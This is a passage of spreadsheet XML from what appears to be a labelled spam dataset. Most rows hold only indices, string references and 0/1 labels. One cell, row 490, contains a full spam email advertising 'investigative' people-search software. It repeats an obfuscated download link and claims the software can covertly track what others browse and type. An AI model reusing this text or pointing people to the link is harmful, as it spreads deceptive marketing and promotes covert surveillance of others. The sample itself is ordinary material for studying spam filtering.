      <c r="D394" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="395" hidden="1">
      <c r="A395" s="1">
        <v>393.0</v>
      </c>
      <c r="B395" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C395" s="1" t="s">
        <v>746</v>
      </c>
      <c r="D395" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="396" hidden="1">
      <c r="A396" s="1">
        <v>394.0</v>
      </c>
      <c r="B396" s="1" t="s">
        <v>747</v>
      </c>
      <c r="C396" s="1" t="s">
        <v>748</v>
      </c>
      <c r="D396" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="397" hidden="1">
      <c r="A397" s="1">
        <v>395.0</v>
      </c>
      <c r="B397" s="1" t="s">
        <v>749</v>
      </c>
      <c r="C397" s="1" t="s">
        <v>750</v>
      </c>
      <c r="D397" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="1">
        <v>396.0</v>
      </c>
      <c r="B398" s="1" t="s">
        <v>751</v>
      </c>
      <c r="C398" s="1" t="s">
        <v>752</v>
      </c>
      <c r="D398" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="399" hidden="1">
      <c r="A399" s="1">
        <v>397.0</v>
      </c>
      <c r="B399" s="1" t="s">
        <v>753</v>
      </c>
      <c r="C399" s="1" t="s">
        <v>754</v>
      </c>
      <c r="D399" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="400" hidden="1">
      <c r="A400" s="1">
        <v>398.0</v>
      </c>
      <c r="B400" s="1" t="s">
        <v>755</v>
      </c>
      <c r="C400" s="1" t="s">
        <v>756</v>
      </c>
      <c r="D400" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="401" hidden="1">
      <c r="A401" s="1">
        <v>399.0</v>
      </c>
      <c r="B401" s="1" t="s">
        <v>757</v>
      </c>
      <c r="C401" s="1" t="s">
        <v>758</v>
      </c>
      <c r="D401" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="402" hidden="1">
      <c r="A402" s="1">
        <v>400.0</v>
      </c>
      <c r="B402" s="1" t="s">
        <v>759</v>
      </c>
      <c r="C402" s="1" t="s">
        <v>760</v>
      </c>
      <c r="D402" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="403" hidden="1">
      <c r="A403" s="1">
        <v>401.0</v>
      </c>
      <c r="B403" s="1" t="s">
        <v>761</v>
      </c>
      <c r="C403" s="1" t="s">
        <v>762</v>
      </c>
      <c r="D403" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="404" hidden="1">
      <c r="A404" s="1">
        <v>402.0</v>
      </c>
      <c r="B404" s="1" t="s">
        <v>763</v>
      </c>
      <c r="C404" s="1" t="s">
        <v>764</v>
      </c>
      <c r="D404" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="405" hidden="1">
      <c r="A405" s="1">
        <v>403.0</v>
      </c>
      <c r="B405" s="1" t="s">
        <v>765</v>
      </c>
      <c r="C405" s="1" t="s">
        <v>766</v>
      </c>
      <c r="D405" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="406" hidden="1">
      <c r="A406" s="1">
        <v>404.0</v>
      </c>
      <c r="B406" s="1" t="s">
        <v>470</v>
      </c>
      <c r="C406" s="1" t="s">
        <v>767</v>
      </c>
      <c r="D406" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="1">
        <v>405.0</v>
      </c>
      <c r="B407" s="1" t="s">
        <v>768</v>
      </c>
      <c r="C407" s="1" t="s">
        <v>769</v>
      </c>
      <c r="D407" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="1">
        <v>406.0</v>
      </c>
      <c r="B408" s="1" t="s">
        <v>770</v>
      </c>
      <c r="C408" s="1" t="s">
        <v>771</v>
      </c>
      <c r="D408" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="409" hidden="1">
      <c r="A409" s="1">
        <v>407.0</v>
      </c>
      <c r="B409" s="1" t="s">
        <v>761</v>
      </c>
      <c r="C409" s="1" t="s">
        <v>762</v>
      </c>
      <c r="D409" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="410" hidden="1">
      <c r="A410" s="1">
        <v>408.0</v>
      </c>
      <c r="B410" s="1" t="s">
        <v>772</v>
      </c>
      <c r="C410" s="1" t="s">
        <v>773</v>
      </c>
      <c r="D410" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="411" hidden="1">
      <c r="A411" s="1">
        <v>409.0</v>
      </c>
      <c r="B411" s="1" t="s">
        <v>774</v>
      </c>
      <c r="C411" s="1" t="s">
        <v>775</v>
      </c>
      <c r="D411" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="1">
        <v>410.0</v>
      </c>
      <c r="B412" s="1" t="s">
        <v>776</v>
      </c>
      <c r="C412" s="1" t="s">
        <v>777</v>
      </c>
      <c r="D412" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="1">
        <v>411.0</v>
      </c>
      <c r="B413" s="1" t="s">
        <v>778</v>
      </c>
      <c r="C413" s="1" t="s">
        <v>779</v>
      </c>
      <c r="D413" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="414" hidden="1">
      <c r="A414" s="1">
        <v>412.0</v>
      </c>
      <c r="B414" s="1" t="s">
        <v>780</v>
      </c>
      <c r="C414" s="1" t="s">
        <v>781</v>
      </c>
      <c r="D414" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="415" hidden="1">
      <c r="A415" s="1">
        <v>413.0</v>
      </c>
      <c r="B415" s="1" t="s">
        <v>782</v>
      </c>
      <c r="C415" s="1" t="s">
        <v>783</v>
      </c>
      <c r="D415" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="416" hidden="1">
      <c r="A416" s="1">
        <v>414.0</v>
      </c>
      <c r="B416" s="1" t="s">
        <v>784</v>
      </c>
      <c r="C416" s="1" t="s">
        <v>785</v>
      </c>
      <c r="D416" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="417" hidden="1">
      <c r="A417" s="1">
        <v>415.0</v>
      </c>
      <c r="B417" s="1" t="s">
        <v>786</v>
      </c>
      <c r="C417" s="1" t="s">
        <v>787</v>
      </c>
      <c r="D417" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="418" hidden="1">
      <c r="A418" s="1">
        <v>416.0</v>
      </c>
      <c r="B418" s="1" t="s">
        <v>788</v>
      </c>
      <c r="C418" s="1" t="s">
        <v>789</v>
      </c>
      <c r="D418" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="1">
        <v>417.0</v>
      </c>
      <c r="B419" s="1" t="s">
        <v>790</v>
      </c>
      <c r="C419" s="1" t="s">
        <v>791</v>
      </c>
      <c r="D419" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="420" hidden="1">
      <c r="A420" s="1">
        <v>418.0</v>
      </c>
      <c r="B420" s="1" t="s">
        <v>792</v>
      </c>
      <c r="C420" s="1" t="s">
        <v>793</v>
      </c>
      <c r="D420" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="1">
        <v>419.0</v>
      </c>
      <c r="B421" s="1" t="s">
        <v>794</v>
      </c>
      <c r="C421" s="1" t="s">
        <v>795</v>
      </c>
      <c r="D421" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="1">
        <v>420.0</v>
      </c>
      <c r="B422" s="1" t="s">
        <v>796</v>
      </c>
      <c r="C422" s="1" t="s">
        <v>797</v>
      </c>
      <c r="D422" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="423" hidden="1">
      <c r="A423" s="1">
        <v>421.0</v>
      </c>
      <c r="B423" s="1" t="s">
        <v>214</v>
      </c>
      <c r="C423" s="1" t="s">
        <v>798</v>
      </c>
      <c r="D423" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="1">
        <v>422.0</v>
      </c>
      <c r="B424" s="1" t="s">
        <v>799</v>
      </c>
      <c r="C424" s="1" t="s">
        <v>800</v>
      </c>
      <c r="D424" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="425" hidden="1">
      <c r="A425" s="1">
        <v>423.0</v>
      </c>
      <c r="B425" s="1" t="s">
        <v>801</v>
      </c>
      <c r="C425" s="1" t="s">
        <v>802</v>
      </c>
      <c r="D425" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="426" hidden="1">
      <c r="A426" s="1">
        <v>424.0</v>
      </c>
      <c r="B426" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C426" s="1" t="s">
        <v>804</v>
      </c>
      <c r="D426" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="1">
        <v>425.0</v>
      </c>
      <c r="B427" s="1" t="s">
        <v>805</v>
      </c>
      <c r="C427" s="1" t="s">
        <v>806</v>
      </c>
      <c r="D427" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="428" hidden="1">
      <c r="A428" s="1">
        <v>426.0</v>
      </c>
      <c r="B428" s="1" t="s">
        <v>807</v>
      </c>
      <c r="C428" s="1" t="s">
        <v>808</v>
      </c>
      <c r="D428" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="429" hidden="1">
      <c r="A429" s="1">
        <v>427.0</v>
      </c>
      <c r="B429" s="1" t="s">
        <v>809</v>
      </c>
      <c r="C429" s="1" t="s">
        <v>810</v>
      </c>
      <c r="D429" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="430" hidden="1">
      <c r="A430" s="1">
        <v>428.0</v>
      </c>
      <c r="B430" s="1" t="s">
        <v>811</v>
      </c>
      <c r="C430" s="1" t="s">
        <v>812</v>
      </c>
      <c r="D430" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="431" hidden="1">
      <c r="A431" s="1">
        <v>429.0</v>
      </c>
      <c r="B431" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C431" s="1" t="s">
        <v>813</v>
      </c>
      <c r="D431" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="432" hidden="1">
      <c r="A432" s="1">
        <v>430.0</v>
      </c>
      <c r="B432" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C432" s="1" t="s">
        <v>815</v>
      </c>
      <c r="D432" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="433" hidden="1">
      <c r="A433" s="1">
        <v>431.0</v>
      </c>
      <c r="B433" s="1" t="s">
        <v>816</v>
      </c>
      <c r="C433" s="1" t="s">
        <v>817</v>
      </c>
      <c r="D433" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="1">
        <v>432.0</v>
      </c>
      <c r="B434" s="1" t="s">
        <v>818</v>
      </c>
      <c r="C434" s="1" t="s">
        <v>819</v>
      </c>
      <c r="D434" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="1">
        <v>433.0</v>
      </c>
      <c r="B435" s="1" t="s">
        <v>820</v>
      </c>
      <c r="C435" s="1" t="s">
        <v>821</v>
      </c>
      <c r="D435" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="1">
        <v>434.0</v>
      </c>
      <c r="B436" s="1" t="s">
        <v>822</v>
      </c>
      <c r="C436" s="1" t="s">
        <v>823</v>
      </c>
      <c r="D436" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="437" hidden="1">
      <c r="A437" s="1">
        <v>435.0</v>
      </c>
      <c r="B437" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C437" s="1" t="s">
        <v>824</v>
      </c>
      <c r="D437" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="438" hidden="1">
      <c r="A438" s="1">
        <v>436.0</v>
      </c>
      <c r="B438" s="1" t="s">
        <v>825</v>
      </c>
      <c r="C438" s="1" t="s">
        <v>826</v>
      </c>
      <c r="D438" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="439" hidden="1">
      <c r="A439" s="1">
        <v>437.0</v>
      </c>
      <c r="B439" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C439" s="1" t="s">
        <v>828</v>
      </c>
      <c r="D439" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="440" hidden="1">
      <c r="A440" s="1">
        <v>438.0</v>
      </c>
      <c r="B440" s="1" t="s">
        <v>829</v>
      </c>
      <c r="C440" s="1" t="s">
        <v>830</v>
      </c>
      <c r="D440" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="1">
        <v>439.0</v>
      </c>
      <c r="B441" s="1" t="s">
        <v>831</v>
      </c>
      <c r="C441" s="1" t="s">
        <v>832</v>
      </c>
      <c r="D441" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="442" hidden="1">
      <c r="A442" s="1">
        <v>440.0</v>
      </c>
      <c r="B442" s="1" t="s">
        <v>833</v>
      </c>
      <c r="C442" s="1" t="s">
        <v>834</v>
      </c>
      <c r="D442" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="443" hidden="1">
      <c r="A443" s="1">
        <v>441.0</v>
      </c>
      <c r="B443" s="1" t="s">
        <v>835</v>
      </c>
      <c r="C443" s="1" t="s">
        <v>836</v>
      </c>
      <c r="D443" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="1">
        <v>442.0</v>
      </c>
      <c r="B444" s="1" t="s">
        <v>837</v>
      </c>
      <c r="C444" s="1" t="s">
        <v>838</v>
      </c>
      <c r="D444" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="1">
        <v>443.0</v>
      </c>
      <c r="B445" s="1" t="s">
        <v>839</v>
      </c>
      <c r="C445" s="1" t="s">
        <v>838</v>
      </c>
      <c r="D445" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="446" hidden="1">
      <c r="A446" s="1">
        <v>444.0</v>
      </c>
      <c r="B446" s="1" t="s">
        <v>840</v>
      </c>
      <c r="C446" s="1" t="s">
        <v>841</v>
      </c>
      <c r="D446" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="447" hidden="1">
      <c r="A447" s="1">
        <v>445.0</v>
      </c>
      <c r="B447" s="1" t="s">
        <v>842</v>
      </c>
      <c r="C447" s="1" t="s">
        <v>843</v>
      </c>
      <c r="D447" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="1">
        <v>446.0</v>
      </c>
      <c r="B448" s="1" t="s">
        <v>844</v>
      </c>
      <c r="C448" s="1" t="s">
        <v>845</v>
      </c>
      <c r="D448" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="449" hidden="1">
      <c r="A449" s="1">
        <v>447.0</v>
      </c>
      <c r="B449" s="1" t="s">
        <v>846</v>
      </c>
      <c r="C449" s="1" t="s">
        <v>847</v>
      </c>
      <c r="D449" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="1">
        <v>448.0</v>
      </c>
      <c r="B450" s="1" t="s">
        <v>848</v>
      </c>
      <c r="C450" s="1" t="s">
        <v>849</v>
      </c>
      <c r="D450" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="1">
        <v>449.0</v>
      </c>
      <c r="B451" s="1" t="s">
        <v>850</v>
      </c>
      <c r="C451" s="1" t="s">
        <v>851</v>
      </c>
      <c r="D451" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="452" hidden="1">
      <c r="A452" s="1">
        <v>450.0</v>
      </c>
      <c r="B452" s="1" t="s">
        <v>852</v>
      </c>
      <c r="C452" s="1" t="s">
        <v>853</v>
      </c>
      <c r="D452" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="453" hidden="1">
      <c r="A453" s="1">
        <v>451.0</v>
      </c>
      <c r="B453" s="1" t="s">
        <v>854</v>
      </c>
      <c r="C453" s="1" t="s">
        <v>855</v>
      </c>
      <c r="D453" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="454" hidden="1">
      <c r="A454" s="1">
        <v>452.0</v>
      </c>
      <c r="B454" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C454" s="1" t="s">
        <v>856</v>
      </c>
      <c r="D454" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="455" hidden="1">
      <c r="A455" s="1">
        <v>453.0</v>
      </c>
      <c r="B455" s="1" t="s">
        <v>857</v>
      </c>
      <c r="C455" s="1" t="s">
        <v>858</v>
      </c>
      <c r="D455" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="456" hidden="1">
      <c r="A456" s="1">
        <v>454.0</v>
      </c>
      <c r="B456" s="1" t="s">
        <v>859</v>
      </c>
      <c r="C456" s="1" t="s">
        <v>860</v>
      </c>
      <c r="D456" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="1">
        <v>455.0</v>
      </c>
      <c r="B457" s="1" t="s">
        <v>861</v>
      </c>
      <c r="C457" s="1" t="s">
        <v>862</v>
      </c>
      <c r="D457" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="458" hidden="1">
      <c r="A458" s="1">
        <v>456.0</v>
      </c>
      <c r="B458" s="1" t="s">
        <v>863</v>
      </c>
      <c r="C458" s="1" t="s">
        <v>864</v>
      </c>
      <c r="D458" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="459" hidden="1">
      <c r="A459" s="1">
        <v>457.0</v>
      </c>
      <c r="B459" s="1" t="s">
        <v>865</v>
      </c>
      <c r="C459" s="1" t="s">
        <v>866</v>
      </c>
      <c r="D459" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="1">
        <v>458.0</v>
      </c>
      <c r="B460" s="1" t="s">
        <v>867</v>
      </c>
      <c r="C460" s="1" t="s">
        <v>868</v>
      </c>
      <c r="D460" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="461" hidden="1">
      <c r="A461" s="1">
        <v>459.0</v>
      </c>
      <c r="B461" s="1" t="s">
        <v>869</v>
      </c>
      <c r="C461" s="1" t="s">
        <v>870</v>
      </c>
      <c r="D461" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="1">
        <v>460.0</v>
      </c>
      <c r="B462" s="1" t="s">
        <v>871</v>
      </c>
      <c r="C462" s="1" t="s">
        <v>872</v>
      </c>
      <c r="D462" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="463" hidden="1">
      <c r="A463" s="1">
        <v>461.0</v>
      </c>
      <c r="B463" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C463" s="1" t="s">
        <v>873</v>
      </c>
      <c r="D463" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="1">
        <v>462.0</v>
      </c>
      <c r="B464" s="1" t="s">
        <v>874</v>
      </c>
      <c r="C464" s="1" t="s">
        <v>875</v>
      </c>
      <c r="D464" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="465" hidden="1">
      <c r="A465" s="1">
        <v>463.0</v>
      </c>
      <c r="B465" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C465" s="1" t="s">
        <v>876</v>
      </c>
      <c r="D465" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="466" hidden="1">
      <c r="A466" s="1">
        <v>464.0</v>
      </c>
      <c r="B466" s="1" t="s">
        <v>877</v>
      </c>
      <c r="C466" s="1" t="s">
        <v>878</v>
      </c>
      <c r="D466" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="1">
        <v>465.0</v>
      </c>
      <c r="B467" s="1" t="s">
        <v>879</v>
      </c>
      <c r="C467" s="1" t="s">
        <v>880</v>
      </c>
      <c r="D467" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="468" hidden="1">
      <c r="A468" s="1">
        <v>466.0</v>
      </c>
      <c r="B468" s="1" t="s">
        <v>881</v>
      </c>
      <c r="C468" s="1" t="s">
        <v>882</v>
      </c>
      <c r="D468" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="1">
        <v>467.0</v>
      </c>
      <c r="B469" s="1" t="s">
        <v>883</v>
      </c>
      <c r="C469" s="1" t="s">
        <v>884</v>
      </c>
      <c r="D469" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="470" hidden="1">
      <c r="A470" s="1">
        <v>468.0</v>
      </c>
      <c r="B470" s="1" t="s">
        <v>885</v>
      </c>
      <c r="C470" s="1" t="s">
        <v>886</v>
      </c>
      <c r="D470" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="471" hidden="1">
      <c r="A471" s="1">
        <v>469.0</v>
      </c>
      <c r="B471" s="1" t="s">
        <v>887</v>
      </c>
      <c r="C471" s="1" t="s">
        <v>888</v>
      </c>
      <c r="D471" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="472" hidden="1">
      <c r="A472" s="1">
        <v>470.0</v>
      </c>
      <c r="B472" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C472" s="1" t="s">
        <v>890</v>
      </c>
      <c r="D472" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="473" hidden="1">
      <c r="A473" s="1">
        <v>471.0</v>
      </c>
      <c r="B473" s="1" t="s">
        <v>891</v>
      </c>
      <c r="C473" s="1" t="s">
        <v>892</v>
      </c>
      <c r="D473" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="474" hidden="1">
      <c r="A474" s="1">
        <v>472.0</v>
      </c>
      <c r="B474" s="1" t="s">
        <v>893</v>
      </c>
      <c r="C474" s="1" t="s">
        <v>894</v>
      </c>
      <c r="D474" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="1">
        <v>473.0</v>
      </c>
      <c r="B475" s="1" t="s">
        <v>895</v>
      </c>
      <c r="C475" s="1" t="s">
        <v>896</v>
      </c>
      <c r="D475" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="476" hidden="1">
      <c r="A476" s="1">
        <v>474.0</v>
      </c>
      <c r="B476" s="1" t="s">
        <v>897</v>
      </c>
      <c r="C476" s="1" t="s">
        <v>898</v>
      </c>
      <c r="D476" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="477" hidden="1">
      <c r="A477" s="1">
        <v>475.0</v>
      </c>
      <c r="B477" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C477" s="1" t="s">
        <v>899</v>
      </c>
      <c r="D477" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="478" hidden="1">
      <c r="A478" s="1">
        <v>476.0</v>
      </c>
      <c r="B478" s="1" t="s">
        <v>367</v>
      </c>
      <c r="C478" s="1" t="s">
        <v>460</v>
      </c>
      <c r="D478" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="1">
        <v>477.0</v>
      </c>
      <c r="B479" s="1" t="s">
        <v>900</v>
      </c>
      <c r="C479" s="1" t="s">
        <v>901</v>
      </c>
      <c r="D479" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="480" hidden="1">
      <c r="A480" s="1">
        <v>478.0</v>
      </c>
      <c r="B480" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C480" s="1" t="s">
        <v>903</v>
      </c>
      <c r="D480" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="481" hidden="1">
      <c r="A481" s="1">
        <v>479.0</v>
      </c>
      <c r="B481" s="1" t="s">
        <v>904</v>
      </c>
      <c r="C481" s="1" t="s">
        <v>905</v>
      </c>
      <c r="D481" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="482" hidden="1">
      <c r="A482" s="1">
        <v>480.0</v>
      </c>
      <c r="B482" s="1" t="s">
        <v>906</v>
      </c>
      <c r="C482" s="1" t="s">
        <v>907</v>
      </c>
      <c r="D482" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="483" hidden="1">
      <c r="A483" s="1">
        <v>481.0</v>
      </c>
      <c r="B483" s="1" t="s">
        <v>908</v>
      </c>
      <c r="C483" s="1" t="s">
        <v>909</v>
      </c>
      <c r="D483" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="484" hidden="1">
      <c r="A484" s="1">
        <v>482.0</v>
      </c>
      <c r="B484" s="1" t="s">
        <v>910</v>
      </c>
      <c r="C484" s="1" t="s">
        <v>911</v>
      </c>
      <c r="D484" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="1">
        <v>483.0</v>
      </c>
      <c r="B485" s="1" t="s">
        <v>912</v>
      </c>
      <c r="C485" s="1" t="s">
        <v>913</v>
      </c>
      <c r="D485" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="486" hidden="1">
      <c r="A486" s="1">
        <v>484.0</v>
      </c>
      <c r="B486" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C486" s="1" t="s">
        <v>915</v>
      </c>
      <c r="D486" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="487" hidden="1">
      <c r="A487" s="1">
        <v>485.0</v>
      </c>
      <c r="B487" s="1" t="s">
        <v>916</v>
      </c>
      <c r="C487" s="1" t="s">
        <v>917</v>
      </c>
      <c r="D487" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="1">
        <v>486.0</v>
      </c>
      <c r="B488" s="1" t="s">
        <v>918</v>
      </c>
      <c r="C488" s="1" t="s">
        <v>919</v>
      </c>
      <c r="D488" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="489" hidden="1">
      <c r="A489" s="1">
        <v>487.0</v>
      </c>
      <c r="B489" s="1" t="s">
        <v>920</v>
      </c>
      <c r="C489" s="1" t="s">
        <v>921</v>
      </c>
      <c r="D489" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="1">
        <v>488.0</v>
      </c>
      <c r="B490" s="1" t="s">
        <v>922</v>
      </c>
      <c r="C490" s="3" t="str">
        <f>============================================
 Brand-New VERSION 7.0 Just Released:
 Astounding New Software Lets You Find
 Out Almost ANYTHING about ANYONE...
 =============================================
 Download it right now (no charge card needed):
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://WWW.BIZH0ST0NE.NET/freeht/mxi.html"&gt;
 http://WWW.BIZH0ST0NE.NET/freeht/mxi.html &lt;/a&gt;
 Discover EVERYTHING you ever wanted to know about:
 your friends
 your family
 your enemies
 your employees
 yourself - Is Someone Using Your Identity?
 even your boss!
 DID YOU KNOW you can search for ANYONE, ANYTIME,
 ANYWHERE, right on the Internet?
 Download this software right now--click here:
 &lt;a href="http://WWW.BIZH0ST0NE.NET/freeht/mxi.html"&gt;
 http://WWW.BIZH0ST0NE.NET/freeht/mxi.html &lt;/a&gt;
 This mammoth COLLECTION of internet investigative
 tools &amp; research sites will provide you with NEARLY
 400 GIGANTIC SEARCH RESOURCES to locate information on:
 * people you trust
 * screen new tenants or roommates
 * housekeepers
 * current or past employment
 * people you work with
 * license plate number with name and address
 * unlisted phone numbers
 * long lost friends
 Locate e-mails, phone numbers, or addresses:
 o Get a Copy of Your FBI file.
 o Get a Copy of Your Military file.
 o FIND DEBTORS and locate HIDDEN ASSETS.
 o Check CRIMINAL Drug and driving RECORDS.
 o Lookup someone's EMPLOYMENT history.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://WWW.BIZH0ST0NE.NET/freeht/mxi.html"&gt;
 http://WWW.BIZH0ST0NE.NET/freeht/mxi.html &lt;/a&gt;
 Locate old classmates, missing family
 member, or a LONG LOST LOVE:
 - Do Background Checks on EMPLOYEES before you
   hire them.
 - Investigate your family history, birth, death
   and government records!
 - Discover how UNLISTED phone numbers are located.
 - Check out your new or old LOVE INTEREST.
 - Verify your own CREDIT REPORTS so you can
   correct WRONG information.
 - Track anyone's Internet ACTIVITY; see the sites
   they visit, and what they are typing.
 - Explore SECRET WEB SITES that conventional
   search engines have never found.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://WWW.BIZH0ST0NE.NET/freeht/mxi.html"&gt;
 http://WWW.BIZH0ST0NE.NET/freeht/mxi.html &lt;/a&gt;
 ==&gt; Discover little-known ways to make UNTRACEABLE
     PHONE CALLS.
 ==&gt; Check ADOPTION records; locate MISSING CHILDREN
     or relatives.
 ==&gt; Dig up information on your FRIENDS, NEIGHBORS,
     or BOSS!
 ==&gt; Discover EMPLOYMENT opportunities from AROUND
     THE WORLD!
 ==&gt; Locate transcripts and COURT ORDERS from all
     50 states.
 ==&gt; CLOAK your EMAIL so your true address can't
     be discovered.
 ==&gt; Find out how much ALIMONY your neighbor is paying.
 ==&gt; Discover how to check your phones for WIRETAPS.
 ==&gt; Or check yourself out, and you will be shocked at
     what you find!!
 These are only a few things you can do, There
 is no limit to the power of this software!!
 To download this software, and have it in less
 than 5 minutes click on the url below to visit
 our website (NEW: No charge card needed!)
 &lt;a href="http://WWW.BIZH0ST0NE.NET/freeht/mxi.html"&gt;
 http://WWW.BIZH0ST0NE.NET/freeht/mxi.html &lt;/a&gt;
 If you no longer wish to hear about future
 offers from us, send us a message with STOP
 in the subject line, by clicking here:
 &lt;a href="mailto:remv0615b@bk.ru?subject=STOP_MX727"&gt;
 mailto:remv0615b@bk.ru?subject=STOP_MX727 &lt;/a&gt;
 Please allow up to 72 hours to take effect.
 Please do not include any correspondence in your
 message to this automatic stop robot--it will
 not be read. All requests processed automatically.
  [FRYTE^3247(^(PO1:KJ)_8J7BJK9^"]
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D490" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="491" hidden="1">
      <c r="A491" s="1">
